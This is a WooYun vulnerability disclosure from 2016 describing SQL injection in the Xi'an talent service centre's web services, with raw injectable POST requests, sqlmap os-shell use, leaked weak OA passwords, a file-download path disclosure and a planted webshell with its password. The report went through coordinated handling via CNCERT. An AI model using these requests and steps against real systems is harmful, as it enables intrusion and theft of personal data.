当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171309

漏洞标题:西安市人才服务中心多处SQL注入泄露24w+人才信息和4w+招聘单位信息(网站路径泄露,已shell)

相关厂商:西安市人才服务中心

漏洞作者: 胡阿尤

提交时间:2016-01-20 14:02

修复时间:2016-03-07 10:49

公开时间:2016-03-07 10:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-22: 厂商已经确认,细节仅向厂商公开
2016-02-01: 细节向核心白帽子及相关领域专家公开
2016-02-11: 细节向普通白帽子公开
2016-02-21: 细节向实习白帽子公开
2016-03-07: 细节向公众公开

简要描述:

西安市人才服务中心,西安市人才网,西安人才公共服务网,西安毕业生就业网都在一个服务器上。
先是发现了sql注入,折腾了几天一直没能上传webshell,今天准备提交了,还是有点不甘心,又找了下,结果爆出路径了。好吧,妥妥的拿下shell,算是一次完整的练习吧。

详细说明:

起因是这样的,前几天看了一些OA的洞,想找一些OA练练手,结果找到这个网址

**.**.**.**


101.JPG


看不懂是什么OA,不知道怎么下手了,工号是什么鬼,猜不出来啊,不然进去看看的话说不定会有收获。
就这样放弃吗?当然不行,主站看看吧,再找找其他子站,找到了

**.**.**.**


102.JPG


103.JPG


是微信的什么接口吗?还是测试用的?
不太清楚,检测一下吧,于是找到了突破口
总共发现6处注入,分别是:
1.

POST /weixinapp/bdsfz.asp HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://**.**.**.**/weixinapp/bdsfz.asp
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASPSESSIONIDSSADRQBC=HLFHJMOCLIMFMKADPPDAJMAM
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
act=act&name=pxntdmjt&sfz=1&weixin=size%3d%2210%22


这里有两处,name和sfz参数均存在注入。

104.JPG


105.JPG


这个注出来的用户是xahaorczx,应该是当前网站数据库的用户。

106.JPG


107.JPG


2.

POST /service1.asmx/search_pos HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://**.**.**.**/service1.asmx
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASPSESSIONIDSSADRQBC=HLFHJMOCLIMFMKADPPDAJMAM
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
area=555&fbrq=1&pos=1


这里也是两处,area和pos参数均存在注入。

108.JPG


109.JPG


110.JPG


当前用户是sa
3.

POST /service1.asmx/newslist HTTP/1.1
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: ASPSESSIONIDSSADRQBC=HLFHJMOCLIMFMKADPPDAJMAM
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
newstype=1


newstype参数存在注入。

111.JPG


112.JPG


还是sa用户
4.

POST /service1.asmx/rcidtf HTTP/1.1
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: ASPSESSIONIDSSADRQBC=HLFHJMOCLIMFMKADPPDAJMAM
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
rcid=1


rcid参数存在注入

113.JPG


114.JPG


这个点权限好像比较低,注不出来用户了
有24个库,貌似涉及相关的多个网站。

115.JPG


**.**.**.**
**.**.**.**
**.**.**.**
应该都是在这一个服务器上。
包含大量敏感信息

116.JPG


人才信息有24万多条,招聘单位信息有4万多条。

117.JPG


118.JPG


可以--os-shell,不过速度太慢了,受不了

119.JPG


也翻到了OA的账号口令,
108/123456
801/123456
很简单哈,可惜我猜不出啊- -!

120.JPG


登录进去发现还是不认识是什么OA,上传图片的地方不会利用,也不敢乱改配置。
纠结了几天一直没能上传webshell,今天打算放弃了,已经可以--os-shell了,算是拿下服务器了吧。
写报告提交吧,不过还是有点不甘心,就又在相关的几个网站逛了逛,发现这个链接。

http://**.**.**.**/downloads.aspx?path=http://**.**.**.**/DownLoads/6/201412111647362263.doc&name=%e3%80%8a%e8%a5%bf%e5%ae%89%e5%b8%82%e7%81%b5%e6%b4%bb%e5%b0%b1%e4%b8%9a%e4%ba%ba%e5%91%98%e9%80%80%e4%bc%91%e7%94%b3%e8%af%b7%e8%a1%a8%e3%80%8b%ef%bc%88%e8%af%b7%e7%94%a8A4%e7%ba%b8%e6%89%93%e5%8d%b0%ef%bc%89


下载的,改改路径看看能不能任意文件下载呗,结果

121.JPG


爆出路径了,嘿嘿,那就妥妥的写入shell了。
**.**.**.**/woo.aspx 密码:wooyun

122.JPG


123.JPG


好了,就到这里吧,仅作测试,未改配置,未动数据,验证后请删除shell。

漏洞证明:

124.JPG


1433端口外部可以访问哦

125.JPG


数据库用户口令hash

修复方案:

版权声明:转载请注明来源 胡阿尤@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-01-22 10:47

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由陕西分中心后续协调网站管理单位处置。

最新状态:

暂无